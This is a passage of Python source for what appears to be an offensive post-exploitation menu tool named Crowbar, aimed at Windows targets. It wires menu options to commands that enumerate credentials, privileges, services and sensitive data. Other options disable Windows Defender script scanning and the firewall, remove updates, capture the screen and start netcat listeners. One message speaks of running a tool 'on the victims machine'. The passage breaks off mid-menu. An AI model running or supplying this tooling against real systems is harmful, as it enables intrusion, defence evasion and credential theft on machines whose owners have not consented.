print("Wrong Command!") 516 | elif scripts == "use 14": 517 | while True: 518 | scriptssnmpkey = input("\nScripts (scripts/cmd/read_registry_snmp_key)\n |==> ") 519 | if scriptssnmpkey == "help": 520 | print(''' 521 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 522 | | help - Prints out help commands. | 523 | | run - Runs the script against the host machine. | 524 | | clear - Clears the screen. | 525 | | back - goes back to the 'Scripts' directory. | 526 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 527 | ''') 528 | elif scriptssnmpkey == "run": 529 | os.system('''reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"''') 530 | elif scriptssnmpkey == "clear": 531 | functionclear() 532 | elif scriptssnmpkey == "back": 533 | leavescripts() 534 | else: 535 | print("Wrong Command!") 536 | elif scripts == "use 15": 537 | while True: 538 | scriptsregrunkey = input("\nScripts (scripts/cmd/read_registry_run_key)\n |==> ") 539 | if scriptsregrunkey == "help": 540 | print(''' 541 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 542 | | help - Prints out help commands. | 543 | | run - Runs the script against the host machine. | 544 | | clear - Clears the screen. | 545 | | back - goes back to the 'Scripts' directory. | 546 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 547 | ''') 548 | elif scriptsregrunkey == "run": 549 | os.system("reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run") 550 | elif scriptsregrunkey == "clear": 551 | functionclear() 552 | elif scriptsregrunkey == "back": 553 | leavescripts() 554 | else: 555 | print("Wrong Command!") 556 | elif scripts == "use 16": 557 | while True: 558 | scriptsnetshares = input("\nScripts (scripts/cmd/list_network_shares)\n |==> ") 559 | if scriptsnetshares == "help": 560 | print(''' 561 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 562 | | help - Prints out help commands. | 563 | | run - Runs the script against the host machine. | 564 | | clear - Clears the screen. | 565 | | back - goes back to the 'Scripts' directory. | 566 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 567 | ''') 568 | elif scriptsnetshares == "run": 569 | os.system("net share") 570 | elif scriptsnetshares == "clear": 571 | functionclear() 572 | elif scriptsnetshares == "back": 573 | leavescripts() 574 | else: 575 | print("Wrong Command!") 576 | elif scripts == "use 17": 577 | while True: 578 | scriptslistlocalgroup = input("\nScripts (scripts/cmd/list_localgroups)\n |==> ") 579 | if scriptslistlocalgroup == "help": 580 | print(''' 581 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 582 | | help - Prints out help commands. | 583 | | run - Runs the script against the host machine. | 584 | | clear - Clears the screen. | 585 | | back - goes back to the 'Scripts' directory. | 586 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 587 | ''') 588 | elif scriptslistlocalgroup == "run": 589 | os.system("net localgroup") 590 | elif scriptslistlocalgroup == "clear": 591 | functionclear() 592 | elif scriptslistlocalgroup == "back": 593 | leavescripts() 594 | else: 595 | print("Wrong Command!") 596 | elif scripts == "use 18": 597 | while True: 598 | scriptslistdrive = input("\nScripts (scripts/cmd/list_drives)\n |==> ") 599 | if scriptslistdrive == "help": 600 | print(''' 601 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 602 | | help - Prints out help commands. | 603 | | run - Runs the script against the host machine. | 604 | | clear - Clears the screen. | 605 | | back - goes back to the 'Scripts' directory. | 606 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 607 | ''') 608 | elif scriptslistdrive == "run": 609 | os.system("wmic logicaldisk get caption,description,providername") 610 | elif scriptslistdrive == "clear": 611 | functionclear() 612 | elif scriptslistdrive == "back": 613 | leavescripts() 614 | else: 615 | print("Wrong Command!") 616 | elif scripts == "use 19": 617 | while True: 618 | scriptsgetsnmpcfg = input("\nScripts (scripts/cmd/get_snmp_config)\n |==> ") 619 | if scriptsgetsnmpcfg == "help": 620 | print(''' 621 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 622 | | help - Prints out help commands. | 623 | | run - Runs the script against the host machine. | 624 | | clear - Clears the screen. | 625 | | back - goes back to the 'Scripts' directory. | 626 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 627 | ''') 628 | elif scriptsgetsnmpcfg == "run": 629 | os.system("reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s") 630 | elif scriptsgetsnmpcfg == "clear": 631 | functionclear() 632 | elif scriptsgetsnmpcfg == "back": 633 | leavescripts() 634 | else: 635 | print("Wrong Command!") 636 | elif scripts == "use 20": 637 | while True: 638 | scriptslistuserpriv = input("\nScripts (scripts/cmd/list_user_privileges)\n |==> ") 639 | if scriptslistuserpriv == "help": 640 | print(''' 641 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 642 | | help - Prints out help commands. | 643 | | run - Runs the script against the host machine. | 644 | | clear - Clears the screen. | 645 | | back - goes back to the 'Scripts' directory. | 646 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 647 | ''') 648 | elif scriptslistuserpriv == "run": 649 | os.system("whoami /priv") 650 | elif scriptslistuserpriv == "clear": 651 | functionclear() 652 | elif scriptslistuserpriv == "back": 653 | leavescripts() 654 | else: 655 | print("Wrong Command!") 656 | elif scripts == "use 21": 657 | while True: 658 | scriptsreadservices = input("\nScripts (scripts/cmd/read_services)\n |==> ") 659 | if scriptsreadservices == "help": 660 | print(''' 661 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 662 | | help - Prints out help commands. | 663 | | run - Runs the script against the host machine. | 664 | | clear - Clears the screen. | 665 | | back - goes back to the 'Scripts' directory. | 666 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 667 | ''') 668 | elif scriptsreadservices == "run": 669 | os.system("wmic service list brief") 670 | elif scriptsreadservices == "clear": 671 | functionclear() 672 | elif scriptsreadservices == "back": 673 | leavescripts() 674 | else: 675 | print("Wrong Command!") 676 | elif scripts == "use 22": 677 | while True: 678 | scriptslistinstalled = input("\nScripts (scripts/cmd/list_installed_updates)\n |==> ") 679 | if scriptslistinstalled == "help": 680 | print(''' 681 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 682 | | help - Prints out help commands. | 683 | | run - Runs the script against the host machine. | 684 | | clear - Clears the screen. | 685 | | back - goes back to the 'Scripts' directory. | 686 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 687 | ''') 688 | elif scriptslistinstalled == "run": 689 | os.system("wmic qfe") 690 | elif scriptslistinstalled == "clear": 691 | functionclear() 692 | elif scriptslistinstalled == "back": 693 | leavescripts() 694 | else: 695 | print("Wrong Command!") 696 | elif scripts == "use 23": 697 | while True: 698 | scriptslistunquote = input("\nScripts (scripts/powershell/list_unquoted_services)\n |==> ") 699 | if scriptslistunquote == "help": 700 | print(''' 701 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 702 | | help - Prints out help commands. | 703 | | run - Runs the script against the host machine. | 704 | | clear - Clears the screen. | 705 | | back - goes back to the 'Scripts' directory. | 706 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 707 | ''') 708 | elif scriptslistunquote == "run": 709 | subprocess.call('''powershell.exe Get-Content scripts/unquoteservice.ps1 | PowerShell.exe -noprofile -''', shell=True) 710 | elif scriptslistunquote == "clear": 711 | functionclear() 712 | elif scriptslistunquote == "back": 713 | leavescripts() 714 | else: 715 | print("Wrong Command!") 716 | elif scripts == "use 24": 717 | while True: 718 | scriptsroutingtable = input("\nScripts (scripts/powershell/list_routing_tables)\n |==> ") 719 | if scriptsroutingtable == "help": 720 | print(''' 721 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 722 | | help - Prints out help commands. | 723 | | run - Runs the script against the host machine. | 724 | | clear - Clears the screen. | 725 | | back - goes back to the 'Scripts' directory. | 726 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 727 | ''') 728 | elif scriptsroutingtable == "run": 729 | subprocess.call('''powershell.exe Get-Content scripts/routingtable.ps1 | PowerShell.exe -noprofile -''', shell=True) 730 | elif scriptsroutingtable == "clear": 731 | functionclear() 732 | elif scriptsroutingtable == "back": 733 | leavescripts() 734 | else: 735 | print("Wrong Command!") 736 | elif scripts == "use 25": 737 | while True: 738 | scriptsnetworkinter = input("\nScripts (scripts/powershell/list_network_interfaces)\n |==> ") 739 | if scriptsnetworkinter == "help": 740 | print(''' 741 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 742 | | help - Prints out help commands. | 743 | | run - Runs the script against the host machine. | 744 | | clear - Clears the screen. | 745 | | back - goes back to the 'Scripts' directory. | 746 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 747 | ''') 748 | elif scriptsnetworkinter == "run": 749 | subprocess.call('''powershell.exe Get-Content scripts/listnetworkinter.ps1 | PowerShell.exe -noprofile -''', shell=True) 750 | elif scriptsnetworkinter == "clear": 751 | functionclear() 752 | elif scriptsnetworkinter == "back": 753 | leavescripts() 754 | else: 755 | print("Wrong Command!") 756 | elif scripts == "use 26": 757 | while True: 758 | scriptslistinstalledproreg = input("\nScripts (scripts/powershell/list_installed_programs_using_registry)\n |==> ") 759 | if scriptslistinstalledproreg == "help": 760 | print(''' 761 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 762 | | help - Prints out help commands. | 763 | | run - Runs the script against the host machine. | 764 | | clear - Clears the screen. | 765 | | back - goes back to the 'Scripts' directory. | 766 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 767 | ''') 768 | elif scriptslistinstalledproreg == "run": 769 | subprocess.call('''powershell.exe Get-Content scripts/listprogramsreg.ps1 | PowerShell.exe -noprofile -''', shell=True) 770 | elif scriptslistinstalledproreg == "clear": 771 | functionclear() 772 | elif scriptslistinstalledproreg == "back": 773 | leavescripts() 774 | else: 775 | print("Wrong Command!") 776 | elif scripts == "use 27": 777 | while True: 778 | scriptslistinstalledprofol = input("\nScripts (scripts/powershell/list_installed_programs_using_folders)\n |==> ") 779 | if scriptslistinstalledprofol == "help": 780 | print(''' 781 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 782 | | help - Prints out help commands. | 783 | | run - Runs the script against the host machine. | 784 | | clear - Clears the screen. | 785 | | back - goes back to the 'Scripts' directory. | 786 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 787 | ''') 788 | elif scriptslistinstalledprofol == "run": 789 | subprocess.call('''powershell.exe Get-Content scripts/listprogramsfol.ps1 | PowerShell.exe -noprofile -''', shell=True) 790 | elif scriptslistinstalledprofol == "clear": 791 | functionclear() 792 | elif scriptslistinstalledprofol == "back": 793 | leavescripts() 794 | else: 795 | print("Wrong Command!") 796 | elif scripts == "use 28": 797 | while True: 798 | scriptslistarptables = input("\nScripts (scripts/powershell/list_arp_tables)\n |==> ") 799 | if scriptslistarptables == "help": 800 | print(''' 801 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 802 | | help - Prints out help commands. | 803 | | run - Runs the script against the host machine. | 804 | | clear - Clears the screen. | 805 | | back - goes back to the 'Scripts' directory. | 806 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 807 | ''') 808 | elif scriptslistarptables == "run": 809 | subprocess.call('''powershell.exe Get-Content scripts/listarptables.ps1 | PowerShell.exe -noprofile -''', shell=True) 810 | elif scriptslistarptables == "clear": 811 | functionclear() 812 | elif scriptslistarptables == "back": 813 | leavescripts() 814 | else: 815 | print("Wrong Command!") 816 | elif scripts == "use 29": 817 | while True: 818 | scriptsgetiisconfig = input("\nScripts (scripts/powershell/get_iis_config)\n |==> ") 819 | if scriptsgetiisconfig == "help": 820 | print(''' 821 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 822 | | help - Prints out help commands. | 823 | | run - Runs the script against the host machine. | 824 | | clear - Clears the screen. | 825 | | back - goes back to the 'Scripts' directory. | 826 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 827 | ''') 828 | elif scriptsgetiisconfig == "run": 829 | subprocess.call('''powershell.exe Get-Content scripts/iisconfig.ps1 | PowerShell.exe -noprofile -''', shell=True) 830 | elif scriptsgetiisconfig == "clear": 831 | functionclear() 832 | elif scriptsgetiisconfig == "back": 833 | leavescripts() 834 | else: 835 | print("Wrong Command!") 836 | elif scripts == "use 30": 837 | while True: 838 | scriptssensitivedata = input("\nScripts (scripts/powershell/sensitive_data_search)\n |==> ") 839 | if scriptssensitivedata == "help": 840 | print(''' 841 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 842 | | help - Prints out help commands. | 843 | | run - Runs the script against the host machine. | 844 | | clear - Clears the screen. | 845 | | back - goes back to the 'Scripts' directory. | 846 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 847 | ''') 848 | elif scriptssensitivedata == "run": 849 | subprocess.call('''powershell.exe Get-Content scripts/sensitive_data_search.ps1 | PowerShell.exe -noprofile -''', shell=True) 850 | elif scriptssensitivedata == "clear": 851 | functionclear() 852 | elif scriptssensitivedata == "back": 853 | leavescripts() 854 | else: 855 | print("Wrong Command!") 856 | elif scripts == "use 31": 857 | while True: 858 | scriptslistcreden = input("\nScripts (scripts/powershell/list_credentials)\n |==> ") 859 | if scriptslistcreden == "help": 860 | print(''' 861 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 862 | | help - Prints out help commands. | 863 | | run - Runs the script against the host machine. | 864 | | clear - Clears the screen. | 865 | | back - goes back to the 'Scripts' directory. | 866 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 867 | ''') 868 | elif scriptslistcreden == "run": 869 | subprocess.call('''powershell.exe Get-Content scripts/listcredentials.ps1 | PowerShell.exe -noprofile -''', shell=True) 870 | elif scriptslistcreden == "clear": 871 | os.system("cls") 872 | elif scriptslistcreden == "back": 873 | leavescripts() 874 | else: 875 | print("Wrong Command!") 876 | elif scripts == "use 32": 877 | while True: 878 | scriptsremoveupdate = input("\nScripts (scripts/powershell/remove_update)\n |==> ") 879 | if scriptsremoveupdate == "help": 880 | print(''' 881 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 882 | | help - Prints out help commands. | 883 | | run - Runs the script against the host machine. | 884 | | clear - Clears the screen. | 885 | | back - goes back to the 'Scripts' directory. | 886 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 887 | ''') 888 | elif scriptsremoveupdate == "run": 889 | subprocess.call('''powershell.exe Get-Content scripts/removeupdate.ps1 | PowerShell.exe -noprofile -''', shell=True) 890 | print(''' 891 | +——— Message ————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 892 | | Updates removed! | 893 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 894 | ''') 895 | elif scriptsremoveupdate == "clear": 896 | os.system("cls") 897 | elif scriptsremoveupdate == "back": 898 | leavescripts() 899 | else: 900 | print("Wrong Command!") 901 | elif scripts == "use 33": 902 | while True: 903 | scriptsgetunconstrained = input("\nScripts (scripts/powershell/get_unconstrained)\n |==> ") 904 | if scriptsgetunconstrained == "help": 905 | print(''' 906 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 907 | | help - Prints out help commands. | 908 | | run - Runs the script against the host machine. | 909 | | clear - Clears the screen. | 910 | | back - goes back to the 'Scripts' directory. | 911 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 912 | ''') 913 | elif scriptsgetunconstrained == "run": 914 | subprocess.call('''(cd scripts) && (PowerShell.exe -ExecutionPolicy Bypass -File ./getunconstrained.ps1)''', shell=True) 915 | elif scriptsgetunconstrained == "clear": 916 | os.system("cls") 917 | elif scriptsgetunconstrained == "back": 918 | leavescripts() 919 | else: 920 | print("Wrong Command!") 921 | elif scripts == "use 34": 922 | while True: 923 | scriptsgetarchitecture = input("\nScripts (scripts/extra/cmd/get_architecture)\n |==> ") 924 | if scriptsgetarchitecture == "help": 925 | print(''' 926 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 927 | | help - Prints out help commands. | 928 | | run - Runs the script against the host machine. | 929 | | clear - Clears the screen. | 930 | | back - goes back to the 'Scripts' directory. | 931 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 932 | ''') 933 | elif scriptsgetarchitecture == "run": 934 | os.system("wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%") 935 | elif scriptsgetarchitecture == "clear": 936 | os.system("cls") 937 | elif scriptsgetarchitecture == "back": 938 | leavescripts() 939 | else: 940 | print("Wrong Command!") 941 | elif scripts == "use 35": 942 | while True: 943 | scriptslistantivirus = input("\nScripts (scripts/extra/cmd/list_antivirus)\n |==> ") 944 | if scriptslistantivirus == "help": 945 | print(''' 946 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 947 | | help - Prints out help commands. | 948 | | run - Runs the script against the host machine. | 949 | | clear - Clears the screen. | 950 | | back - goes back to the 'Scripts' directory. | 951 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 952 | ''') 953 | elif scriptslistantivirus == "run": 954 | os.system("cd scripts && list_antivirus.bat") 955 | elif scriptslistantivirus == "clear": 956 | os.system("cls") 957 | elif scriptslistantivirus == "back": 958 | leavescripts() 959 | else: 960 | print("Wrong Command!") 961 | else: 962 | print("Wrong Command!") 963 | 964 | 965 | def leaveutil(): 966 | util() 967 | 968 | 969 | def util(): 970 | while True: 971 | util = input("\nUtil (util/)\n |==> ") 972 | if util == "help": 973 | print(''' 974 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 975 | | help - Prints out help commands. | 976 | | list - Lists all the utilities. | 977 | | use (utility number) - Selects and loads specified utility. Example: use 1 | 978 | | clear - Clears the screen. | 979 | | back - Goes back to the Crowbar menu. | 980 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 981 | ''') 982 | elif util == "list": 983 | print(''' 984 | +———— Utilities —————————————————————————————————————————————————————————————————— Description ————————————————————————————————————————————————————+ 985 | | 1. util/extra/vmdetect A utility for VM Detection. | 986 | | 2. util/nmap [Nmap must be installed on target machine] Runs a port scan against the target. | 987 | | 3. util/screencapture Takes a screenshot of the targets screen. | 988 | | 4. util/extra/avtrigger [Golang must be installed on target machine] Triggers targets AntiVirus [if enabled] with a video. | 989 | | 5. util/imonitor A utility for task monitoring. | 990 | | 6. util/ipv4 Grabs IPv4 of target machine. | 991 | | 7. util/netcat [NetCat must be installed on the target machine] Starts netcat listener. | 992 | | 8. util/powershell/check_windows_av Checks the status of Windows Defender. | 993 | | 9. util/powershell/disable_script_scanning Disables script scanning on the target machine. | 994 | | 10. util/powershell/list_firewall_blocked_ports List firewall's blocked ports. | 995 | | 11. util/powershell/disable_firewall [Windows 7 Only] Disables the firewall on the target machine. | 996 | | 12. util/powershell/get_powershell_history Gets the powershell command history of the target machine. | 997 | +——————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 998 | ''') 999 | elif util == "clear": 1000 | functionclear() 1001 | elif util == "back": 1002 | crowbarbanner() 1003 | mainmenuinput() 1004 | elif util == "use 1": 1005 | print(''' 1006 | +——— Message ————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1007 | | Make sure you compile this into an EXE before | 1008 | | executing on the victims machine! This was made by my friend. | 1009 | | Credits to: https://github.com/dehoisted | 1010 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1011 | ''') 1012 | elif util == "use 2": 1013 | while True: 1014 | utilnmap = input("\nUtil (util/nmap)\n |==> ") 1015 | if utilnmap == "help": 1016 | print(''' 1017 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1018 | | help - Prints out help commands. | 1019 | | nmap - Will allow you to port scan the machine. | 1020 | | clear - Clears the screen. | 1021 | | back - goes back to the 'Util' directory. | 1022 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1023 | ''') 1024 | elif utilnmap == "nmap": 1025 | utilnmapinput = input("\nUtil (Do you want to do a default scan? y or n)\n |==> ") 1026 | if utilnmapinput == "Y" or utilnmapinput == "y": 1027 | os.system("nmap localhost") 1028 | print(''' 1029 | +——— Message ————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1030 | | Scan complete! | 1031 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1032 | ''') 1033 | elif utilnmapinput == "N" or utilnmapinput == "n": 1034 | utilnmapcustom = input("\nUtil (Type in custom command)\n |==> ") 1035 | os.system("{}".format(utilnmapcustom)) 1036 | print(''' 1037 | +——— Message ————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1038 | | Scan complete! | 1039 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1040 | ''') 1041 | else: 1042 | print("Wrong Command!") 1043 | elif utilnmap == "back": 1044 | leaveutil() 1045 | elif utilnmap == "clear": 1046 | functionclear() 1047 | else: 1048 | print("Wrong Command!") 1049 | elif util == "use 3": 1050 | while True: 1051 | utilss = input("\nUtil (util/screencapture)\n |==> ") 1052 | if utilss == "help": 1053 | print(''' 1054 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1055 | | help - Prints out help commands. | 1056 | | capture - Captures the screen. | 1057 | | clear - Clears the screen. | 1058 | | back - Goes back to the 'Util' directory. | 1059 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1060 | ''') 1061 | elif utilss == "capture": 1062 | os.system("py util/screencapture.py") 1063 | elif utilss == "clear": 1064 | functionclear() 1065 | elif utilss == "back": 1066 | leaveutil() 1067 | else: 1068 | print("Wrong Command!") 1069 | elif util == "use 4": 1070 | while True: 1071 | utilavtrig = input("\nUtil (util/extra/avtrigger)\n |==> ") 1072 | if utilavtrig == "help": 1073 | print(''' 1074 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1075 | | help - Prints out help commands. | 1076 | | trigger - Triggers the AV. | 1077 | | clear - Clears the screen. | 1078 | | back - Goes back to the 'Util' directory. | 1079 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1080 | ''') 1081 | elif utilavtrig == "trigger": 1082 | os.system("go run util/Avtrigger/main.go") 1083 | print(''' 1084 | +——— Message ————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1085 | | AntiVirus triggered! | 1086 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1087 | ''') 1088 | elif utilavtrig == "clear": 1089 | functionclear() 1090 | elif utilavtrig == "back": 1091 | leaveutil() 1092 | elif util == "use 5": 1093 | while True: 1094 | utilimonitor = input("\nUtil (util/imonitor)\n |==> ") 1095 | if utilimonitor == "help": 1096 | print(''' 1097 | +— iMonitor Commands —————————————————————————————————————————————————————————————————— Description ———————————————————————————————————————+ 1098 | | tasklist Lists active procceses. | 1099 | | forcekill Allows you to forcibly kill tasks. | 1100 | | remotetask Allows you to list tasks on a remote computer. | 1101 | | stasks Allows you to query tasks you have access to. | 1102 | +——————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1103 | 1104 | +——— Regular Help Commands ——————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1105 | | help - Prints out help commands. | 1106 | | clear - Clears the screen. | 1107 | | back - Goes back to the 'Util' directory. | 1108 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1109 | ''') 1110 | elif utilimonitor == "clear": 1111 | functionclear() 1112 | elif utilimonitor == "back": 1113 | leaveutil() 1114 | elif utilimonitor == "tasklist": 1115 | os.system("tasklist /svc") 1116 | elif utilimonitor == "forcekill": 1117 | utilimonpid = input("\nUtil (Enter PID of process you want to kill)\n |==> ") 1118 | os.system("taskkill /PID {} /F".format(utilimonpid)) 1119 | elif utilimonitor == "remotetask": 1120 | utilimonremote = input("\nUtil (Enter Name of remote computer)\n |==> ") 1121 | os.system("tasklist /V /S {}".format(utilimonremote)) 1122 | elif utilimonitor == "stasks": 1123 | os.system("schtasks") 1124 | else: 1125 | print("Wrong Command!") 1126 | elif util == "use 6": 1127 | while True: 1128 | utilipv4 = input("\nUtil (util/ipv4)\n |==> ") 1129 | if utilipv4 == "help": 1130 | print(''' 1131 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1132 | | help - Prints out help commands. | 1133 | | ip - Gets the target machines IP address. | 1134 | | track - Tracks the target machines IP address. | 1135 | | clear - Clears the screen. | 1136 | | back - Goes back to the 'Util' directory. | 1137 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1138 | ''') 1139 | elif utilipv4 == "ip": 1140 | print(ipurl) 1141 | elif utilipv4 == "track": 1142 | print(iptrack) 1143 | elif utilipv4 == "clear": 1144 | functionclear() 1145 | elif utilipv4 == "back": 1146 | leaveutil() 1147 | else: 1148 | print("Wrong Command!") 1149 | elif util == "use 7": 1150 | while True: 1151 | utilnetcat = input("\nUtil (util/netcat)\n |==> ") 1152 | if utilnetcat == "help": 1153 | print(''' 1154 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1155 | | help - Prints out help commands. | 1156 | | listen - Gets the target machines IP address. | 1157 | | clear - Clears the screen. | 1158 | | back - Goes back to the 'Util' directory. | 1159 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1160 | ''') 1161 | elif utilnetcat == "listen": 1162 | utilnetcatoption = input("\nUtil (Do you want to start the listener with default settings? y or n)\n |==> ") 1163 | if utilnetcatoption == "Y" or utilnetcatoption == "y": 1164 | utilnetcatoptionyes = input("\nUtil (Type in IP)\n |==> ") 1165 | utilnetcatoptionyes1 = input("\nUtil (Type in Port)\n |==> ") 1166 | print(''' 1167 | +——— Message ————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1168 | | Listener started! | 1169 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1170 | ''') 1171 | os.system("ncat -nv {} {}".format(utilnetcatoptionyes, utilnetcatoptionyes1)) 1172 | elif utilnetcatoption == "N" or utilnetcatoption == "n": 1173 | utilnetcatoptionno = input("\nUtil (Type in custom command)\n |==> ") 1174 | os.system("{}".format(utilnetcatoptionno)) 1175 | else: 1176 | print("Wrong Command!") 1177 | elif utilnetcat == "clear": 1178 | os.system("cls") 1179 | elif utilnetcat == "back": 1180 | leaveutil() 1181 | else: 1182 | print("Wrong Command!") 1183 | elif util == "use 8": 1184 | while True: 1185 | utilcheckwindowsav = input("\nUtil (util/powershell/check_windows_av)\n |==> ") 1186 | if utilcheckwindowsav == "help": 1187 | print(''' 1188 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1189 | | help - Prints out help commands. | 1190 | | run - Runs utility against the target machine. | 1191 | | clear - Clears the screen. | 1192 | | back - Goes back to the 'Util' directory. | 1193 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1194 | ''') 1195 | elif utilcheckwindowsav == "run": 1196 | subprocess.call('''powershell.exe Get-MpComputerStatus''', shell=True) 1197 | elif utilcheckwindowsav == "clear": 1198 | os.system("cls") 1199 | elif utilcheckwindowsav == "back": 1200 | leaveutil() 1201 | else: 1202 | print("Wrong Command!") 1203 | elif util == "use 9": 1204 | while True: 1205 | utildisablescriptscanning = input("\nUtil (util/powershell/disable_script_scanning)\n |==> ") 1206 | if utildisablescriptscanning == "help": 1207 | print(''' 1208 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1209 | | help - Prints out help commands. | 1210 | | run - Runs utility against the target machine. | 1211 | | clear - Clears the screen. | 1212 | | back - Goes back to the 'Util' directory. | 1213 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1214 | ''') 1215 | elif utildisablescriptscanning == "run": 1216 | subprocess.call('''powershell.exe Set-MpPreference -DisableScriptScanning 1''', shell=True) 1217 | elif utildisablescriptscanning == "clear": 1218 | os.system("cls") 1219 | elif utildisablescriptscanning == "back": 1220 | leaveutil() 1221 | else: 1222 | print("Wrong Command!") 1223 | elif util == "use 10": 1224 | while True: 1225 | utillistfirewallblockedports = input("\nUtil (util/powershell/list_firewall_blocked_ports)\n |==> ") 1226 | if utillistfirewallblockedports == "help": 1227 | print(''' 1228 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1229 | | help - Prints out help commands. | 1230 | | run - Runs utility against the target machine. | 1231 | | clear - Clears the screen. | 1232 | | back - Goes back to the 'Util' directory. | 1233 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1234 | ''') 1235 | elif utillistfirewallblockedports == "run": 1236 | subprocess.call('''powershell.exe Get-Content util/list_firewall_blocked_ports.ps1 | PowerShell.exe -noprofile -''', shell=True) 1237 | elif utillistfirewallblockedports == "clear": 1238 | os.system("cls") 1239 | elif utillistfirewallblockedports == "back": 1240 | leaveutil() 